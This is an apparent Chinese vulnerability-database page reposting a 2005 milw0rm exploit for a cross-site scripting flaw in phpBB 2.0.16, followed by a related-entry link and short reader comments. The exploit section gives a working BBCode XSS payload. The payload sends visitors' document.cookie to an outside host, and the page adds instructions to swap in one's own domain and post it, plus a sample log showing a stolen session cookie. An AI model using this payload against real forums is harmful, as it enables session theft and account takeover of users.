phpBB 2.0.16 – Cross-Site Scripting Remote Cookie Disclosure
漏洞ID | 1055238 | 漏洞类型 | |
发布时间 | 2005-07-08 | 更新时间 | 2005-07-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.
Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500]
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"
/str0ke
*/
******************************************************************************************************
* CCTEAM PhpBB 2.0.16 XSS EXPLOIT *
* Powered by D|ablo CCTEAM *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
******************************************************************************************************
* http://ccteam.ru/ *
* http://defacers.ru/ *
******************************************************************************************************
# milw0rm.com [2005-07-08]
相关推荐: SGI IRISConsole icadmin越权存取漏洞
SGI IRISConsole icadmin越权存取漏洞 漏洞ID 1204354 漏洞类型 输入验证 发布时间 2002-05-16 更新时间 2005-05-02 CVE编号 CVE-2002-0171 CNNVD-ID CNNVD-200205-039…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666